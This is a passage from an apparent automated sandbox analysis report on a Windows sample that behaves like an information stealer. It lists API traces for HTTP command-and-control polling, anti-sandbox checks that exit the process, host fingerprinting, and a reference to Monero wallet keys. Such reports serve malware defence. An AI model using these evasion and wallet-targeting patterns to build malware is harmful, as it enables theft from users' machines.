                      • InternetOpenA.WININET(00F00DFE,00000001,00000000,00000000,00000000), ref: 00EE62E1
                      • StrCmpCA.SHLWAPI(?,0168E470), ref: 00EE6303
                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EE6335
                      • HttpOpenRequestA.WININET(00000000,GET,?,0168DA40,00000000,00000000,00400100,00000000), ref: 00EE6385
                      • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00EE63BF
                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EE63D1
                      • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00EE63FD
                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00EE646D
                      • InternetCloseHandle.WININET(00000000), ref: 00EE64EF
                      • InternetCloseHandle.WININET(00000000), ref: 00EE64F9
                      • InternetCloseHandle.WININET(00000000), ref: 00EE6503
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                      • String ID: ERROR$ERROR$GET
                      • API String ID: 3749127164-2509457195
                      • Opcode ID: 6db72ae4c55c95fda492e5c4ba08a1e8e3d3e20e4cd9a7a3e73307980687dc4f
                      • Instruction ID: 5e213b533e77632ecaa8f175bfeb7de51e67d2a521504ea965670938bfdb7a9e
                      • Opcode Fuzzy Hash: 6db72ae4c55c95fda492e5c4ba08a1e8e3d3e20e4cd9a7a3e73307980687dc4f
                      • Instruction Fuzzy Hash: A0713A71A0025CABDB24DFA0DC49BEE77B8BB44700F1091A9F60A7B5C4DBB46A85CF51
                      Function 00EF5510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1090 ef5510-ef5577 call ef5ad0 call efa820 * 3 call efa740 * 4 1106 ef557c-ef5583 1090->1106 1107 ef55d7-ef564c call efa740 * 2 call ee1590 call ef52c0 call efa8a0 call efa800 call efaad0 StrCmpCA 1106->1107 1108 ef5585-ef55b6 call efa820 call efa7a0 call ee1590 call ef51f0 1106->1108 1133 ef5693-ef56a9 call efaad0 StrCmpCA 1107->1133 1138 ef564e-ef568e call efa7a0 call ee1590 call ef51f0 call efa8a0 call efa800 1107->1138 1124 ef55bb-ef55d2 call efa8a0 call efa800 1108->1124 1124->1133 1140 ef56af-ef56b6 1133->1140 1141 ef57dc-ef5844 call efa8a0 call efa820 * 2 call ee1670 call efa800 * 4 call ef6560 call ee1550 1133->1141 1138->1133 1144 ef56bc-ef56c3 1140->1144 1145 ef57da-ef585f call efaad0 StrCmpCA 1140->1145 1270 ef5ac3-ef5ac6 1141->1270 1149 ef571e-ef5793 call efa740 * 2 call ee1590 call ef52c0 call efa8a0 call efa800 call efaad0 StrCmpCA 1144->1149 1150 ef56c5-ef5719 call efa820 call efa7a0 call ee1590 call ef51f0 call efa8a0 call efa800 1144->1150 1164 ef5865-ef586c 1145->1164 1165 ef5991-ef59f9 call efa8a0 call efa820 * 2 call ee1670 call efa800 * 4 call ef6560 call ee1550 1145->1165 1149->1145 1250 ef5795-ef57d5 call efa7a0 call ee1590 call ef51f0 call efa8a0 call efa800 1149->1250 1150->1145 1171 ef598f-ef5a14 call efaad0 StrCmpCA 1164->1171 1172 ef5872-ef5879 1164->1172 1165->1270 1201 ef5a28-ef5a91 call efa8a0 call efa820 * 2 call ee1670 call efa800 * 4 call ef6560 call ee1550 1171->1201 1202 ef5a16-ef5a21 Sleep 1171->1202 1180 ef587b-ef58ce call efa820 call efa7a0 call ee1590 call ef51f0 call efa8a0 call efa800 1172->1180 1181 ef58d3-ef5948 call efa740 * 2 call ee1590 call ef52c0 call efa8a0 call efa800 call efaad0 StrCmpCA 1172->1181 1180->1171 1181->1171 1275 ef594a-ef598a call efa7a0 call ee1590 call ef51f0 call efa8a0 call efa800 1181->1275 1201->1270 1202->1106 1250->1145 1275->1171
                      APIs
                        • Part of subcall function 00EFA820: lstrlen.KERNEL32(00EE4F05,?,?,00EE4F05,00F00DDE), ref: 00EFA82B
                        • Part of subcall function 00EFA820: lstrcpy.KERNEL32(00F00DDE,00000000), ref: 00EFA885
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00EF5644
                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00EF56A1
                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00EF5857
                        • Part of subcall function 00EFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EFA7E6
                        • Part of subcall function 00EF51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00EF5228
                        • Part of subcall function 00EFA8A0: lstrcpy.KERNEL32(?,00F00E17), ref: 00EFA905
                        • Part of subcall function 00EF52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00EF5318
                        • Part of subcall function 00EF52C0: lstrlen.KERNEL32(00000000), ref: 00EF532F
                        • Part of subcall function 00EF52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00EF5364
                        • Part of subcall function 00EF52C0: lstrlen.KERNEL32(00000000), ref: 00EF5383
                        • Part of subcall function 00EF52C0: lstrlen.KERNEL32(00000000), ref: 00EF53AE
                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00EF578B
                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00EF5940
                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00EF5A0C
                      • Sleep.KERNEL32(0000EA60), ref: 00EF5A1B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpylstrlen$Sleep
                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                      • API String ID: 507064821-2791005934
                      • Opcode ID: 05fcb8af933401f52d8563a8907988996b0d5c50216ca5214cb5364a4b05af42
                      • Instruction ID: 5ddbd443e907ff43acadeaf5e490e122b70e0047ea521060148079095937c4b5
                      • Opcode Fuzzy Hash: 05fcb8af933401f52d8563a8907988996b0d5c50216ca5214cb5364a4b05af42
                      • Instruction Fuzzy Hash: 98E184B291010CAACB18FBA0E856DFD73B8AF54340F449138F61A77095EF746A59CB92
                      Function 00EF17A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1301 ef17a0-ef17cd call efaad0 StrCmpCA 1304 ef17cf-ef17d1 ExitProcess 1301->1304 1305 ef17d7-ef17f1 call efaad0 1301->1305 1309 ef17f4-ef17f8 1305->1309 1310 ef17fe-ef1811 1309->1310 1311 ef19c2-ef19cd call efa800 1309->1311 1313 ef199e-ef19bd 1310->1313 1314 ef1817-ef181a 1310->1314 1313->1309 1316 ef18cf-ef18e0 StrCmpCA 1314->1316 1317 ef198f-ef1999 call efa820 1314->1317 1318 ef18ad-ef18be StrCmpCA 1314->1318 1319 ef1849-ef1858 call efa820 1314->1319 1320 ef1821-ef1830 call efa820 1314->1320 1321 ef187f-ef1890 StrCmpCA 1314->1321 1322 ef185d-ef186e StrCmpCA 1314->1322 1323 ef1835-ef1844 call efa820 1314->1323 1324 ef1913-ef1924 StrCmpCA 1314->1324 1325 ef1932-ef1943 StrCmpCA 1314->1325 1326 ef18f1-ef1902 StrCmpCA 1314->1326 1327 ef1951-ef1962 StrCmpCA 1314->1327 1328 ef1970-ef1981 StrCmpCA 1314->1328 1333 ef18ec 1316->1333 1334 ef18e2-ef18e5 1316->1334 1317->1313 1331 ef18ca 1318->1331 1332 ef18c0-ef18c3 1318->1332 1319->1313 1320->1313 1329 ef189e-ef18a1 1321->1329 1330 ef1892-ef189c 1321->1330 1350 ef187a 1322->1350 1351 ef1870-ef1873 1322->1351 1323->1313 1337 ef1926-ef1929 1324->1337 1338 ef1930 1324->1338 1339 ef194f 1325->1339 1340 ef1945-ef1948 1325->1340 1335 ef190e 1326->1335 1336 ef1904-ef1907 1326->1336 1341 ef196e 1327->1341 1342 ef1964-ef1967 1327->1342 1344 ef198d 1328->1344 1345 ef1983-ef1986 1328->1345 1352 ef18a8 1329->1352 1330->1352 1331->1313 1332->1331 1333->1313 1334->1333 1335->1313 1336->1335 1337->1338 1338->1313 1339->1313 1340->1339 1341->1313 1342->1341 1344->1313 1345->1344 1350->1313 1351->1350 1352->1313
                      APIs
                      • StrCmpCA.SHLWAPI(00000000,block), ref: 00EF17C5
                      • ExitProcess.KERNEL32 ref: 00EF17D1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExitProcess
                      • String ID: block
                      • API String ID: 621844428-2199623458
                      • Opcode ID: 899f872539910e8801726d8f3b0aa968968663fb03c3722ef0ac4d6919863414
                      • Instruction ID: 73cc6c33b16607e42579418560cae83a5a58d3a04949e8b5dd23e342d74d9a5c
                      • Opcode Fuzzy Hash: 899f872539910e8801726d8f3b0aa968968663fb03c3722ef0ac4d6919863414
                      • Instruction Fuzzy Hash: 5B515FB4A0420DEBCB18DFA0D994BBE77B5BF84704F109098E6157B340DBB0D951EBA2
                      Function 00EF7500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1356 ef7500-ef754a GetWindowsDirectoryA 1357 ef754c 1356->1357 1358 ef7553-ef75c7 GetVolumeInformationA call ef8d00 * 3 1356->1358 1357->1358 1365 ef75d8-ef75df 1358->1365 1366 ef75fc-ef7617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 ef75e1-ef75fa call ef8d00 1365->1367 1369 ef7619-ef7626 call efa740 1366->1369 1370 ef7628-ef7658 wsprintfA call efa740 1366->1370 1367->1365 1377 ef767e-ef768e 1369->1377 1370->1377
                      APIs
                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00EF7542
                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00EF757F
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EF7603
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00EF760A
                      • wsprintfA.USER32 ref: 00EF7640
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                      • String ID: :$C$\
                      • API String ID: 1544550907-3809124531
                      • Opcode ID: 3870139a8c399906491284c1241a761359650c1d74b8acb97b45789edc70fddb
                      • Instruction ID: 98dd6c7d2870e8b9388366529b0ba9ec0da40b1aa2342be02531f9b1a8ccea72
                      • Opcode Fuzzy Hash: 3870139a8c399906491284c1241a761359650c1d74b8acb97b45789edc70fddb
                      • Instruction Fuzzy Hash: 2A41A5B1D0424CABDF24DF94DC45BEEBBB8AF48704F104099F609B7284D7756A84CBA5
                      Function 00EF69F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                        • Part of subcall function 00EF9860: GetProcAddress.KERNEL32(76F70000,016807C8), ref: 00EF98A1
                        • Part of subcall function 00EF9860: GetProcAddress.KERNEL32(76F70000,01680798), ref: 00EF98BA
                        • Part of subcall function 00EF9860: GetProcAddress.KERNEL32(76F70000,01680678), ref: 00EF98D2
                        • Part of subcall function 00EF9860: GetProcAddress.KERNEL32(76F70000,01680690), ref: 00EF98EA
                        • Part of subcall function 00EF9860: GetProcAddress.KERNEL32(76F70000,01680600), ref: 00EF9903
                        • Part of subcall function 00EF9860: GetProcAddress.KERNEL32(76F70000,01688A58), ref: 00EF991B
                        • Part of subcall function 00EF9860: GetProcAddress.KERNEL32(76F70000,01676960), ref: 00EF9933
                        • Part of subcall function 00EF9860: GetProcAddress.KERNEL32(76F70000,016765C0), ref: 00EF994C
                        • Part of subcall function 00EF9860: GetProcAddress.KERNEL32(76F70000,016807B0), ref: 00EF9964
                        • Part of subcall function 00EF9860: GetProcAddress.KERNEL32(76F70000,01680528), ref: 00EF997C
                        • Part of subcall function 00EF9860: GetProcAddress.KERNEL32(76F70000,01680558), ref: 00EF9995
                        • Part of subcall function 00EF9860: GetProcAddress.KERNEL32(76F70000,01680630), ref: 00EF99AD
                        • Part of subcall function 00EF9860: GetProcAddress.KERNEL32(76F70000,016765E0), ref: 00EF99C5
                        • Part of subcall function 00EF9860: GetProcAddress.KERNEL32(76F70000,016805E8), ref: 00EF99DE
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                        • Part of subcall function 00EE11D0: ExitProcess.KERNEL32 ref: 00EE1211
                        • Part of subcall function 00EE1160: GetSystemInfo.KERNEL32(?), ref: 00EE116A
                        • Part of subcall function 00EE1160: ExitProcess.KERNEL32 ref: 00EE117E
                        • Part of subcall function 00EE1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00EE112B
                        • Part of subcall function 00EE1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00EE1132
                        • Part of subcall function 00EE1110: ExitProcess.KERNEL32 ref: 00EE1143
                        • Part of subcall function 00EE1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00EE123E
                        • Part of subcall function 00EE1220: __aulldiv.LIBCMT ref: 00EE1258
                        • Part of subcall function 00EE1220: __aulldiv.LIBCMT ref: 00EE1266
                        • Part of subcall function 00EE1220: ExitProcess.KERNEL32 ref: 00EE1294
                        • Part of subcall function 00EF6770: GetUserDefaultLangID.KERNEL32 ref: 00EF6774
                        • Part of subcall function 00EE1190: ExitProcess.KERNEL32 ref: 00EE11C6
                        • Part of subcall function 00EF7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00EE11B7), ref: 00EF7880
                        • Part of subcall function 00EF7850: RtlAllocateHeap.NTDLL(00000000), ref: 00EF7887
                        • Part of subcall function 00EF7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00EF789F
                        • Part of subcall function 00EF78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EF7910
                        • Part of subcall function 00EF78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00EF7917
                        • Part of subcall function 00EF78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00EF792F
                        • Part of subcall function 00EFA9B0: lstrlen.KERNEL32(?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EFA9C5
                        • Part of subcall function 00EFA9B0: lstrcpy.KERNEL32(00000000), ref: 00EFAA04
                        • Part of subcall function 00EFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EFAA12
                        • Part of subcall function 00EFA8A0: lstrcpy.KERNEL32(?,00F00E17), ref: 00EFA905
                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01688B18,?,00F0110C,?,00000000,?,00F01110,?,00000000,00F00AEF), ref: 00EF6ACA
                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00EF6AE8
                      • CloseHandle.KERNEL32(00000000), ref: 00EF6AF9
                      • Sleep.KERNEL32(00001770), ref: 00EF6B04
                      • CloseHandle.KERNEL32(?,00000000,?,01688B18,?,00F0110C,?,00000000,?,00F01110,?,00000000,00F00AEF), ref: 00EF6B1A
                      • ExitProcess.KERNEL32 ref: 00EF6B22
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                      • String ID:
                      • API String ID: 2525456742-0
                      • Opcode ID: 03bf8e213969874a30a1b1bfc1789abab2bf08fca86f632a40798bfd1e25ee5a
                      • Instruction ID: c1edf7afedb3f410b760fc44f7d3eec4de0b1005188999f0787611ecf61fe5f8
                      • Opcode Fuzzy Hash: 03bf8e213969874a30a1b1bfc1789abab2bf08fca86f632a40798bfd1e25ee5a
                      • Instruction Fuzzy Hash: 7731FE7190010CABDB18FBA0E856BFE77B8AF44380F146538F316BA185DFB05A45C7A6
                      Function 00EE1220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1436 ee1220-ee1247 call ef89b0 GlobalMemoryStatusEx 1439 ee1249-ee1271 call efda00 * 2 1436->1439 1440 ee1273-ee127a 1436->1440 1441 ee1281-ee1285 1439->1441 1440->1441 1443 ee129a-ee129d 1441->1443 1444 ee1287 1441->1444 1446 ee1289-ee1290 1444->1446 1447 ee1292-ee1294 ExitProcess 1444->1447 1446->1443 1446->1447
                      APIs
                      • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00EE123E
                      • __aulldiv.LIBCMT ref: 00EE1258
                      • __aulldiv.LIBCMT ref: 00EE1266
                      • ExitProcess.KERNEL32 ref: 00EE1294
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                      • String ID: @
                      • API String ID: 3404098578-2766056989
                      • Opcode ID: b82b7a7a1537be8e8d175f871f38dde70bbb878c91a2d1ec2c04c92c51714e3e
                      • Instruction ID: 316212524ddbcbcde9c71bd2636e11b1efc5f93abe3fa03709db6b67c6becaa1
                      • Opcode Fuzzy Hash: b82b7a7a1537be8e8d175f871f38dde70bbb878c91a2d1ec2c04c92c51714e3e
                      • Instruction Fuzzy Hash: 35018FB094434CBADF10DBD0CC49BADBBB8AB04705F208044E705B6180D67455809758
                      Function 00EF6AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1450 ef6af3 1451 ef6b0a 1450->1451 1453 ef6b0c-ef6b22 call ef6920 call ef5b10 CloseHandle ExitProcess 1451->1453 1454 ef6aba-ef6ad7 call efaad0 OpenEventA 1451->1454 1460 ef6ad9-ef6af1 call efaad0 CreateEventA 1454->1460 1461 ef6af5-ef6b04 CloseHandle Sleep 1454->1461 1460->1453 1461->1451
                      APIs
                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01688B18,?,00F0110C,?,00000000,?,00F01110,?,00000000,00F00AEF), ref: 00EF6ACA
                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00EF6AE8
                      • CloseHandle.KERNEL32(00000000), ref: 00EF6AF9
                      • Sleep.KERNEL32(00001770), ref: 00EF6B04
                      • CloseHandle.KERNEL32(?,00000000,?,01688B18,?,00F0110C,?,00000000,?,00F01110,?,00000000,00F00AEF), ref: 00EF6B1A
                      • ExitProcess.KERNEL32 ref: 00EF6B22
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
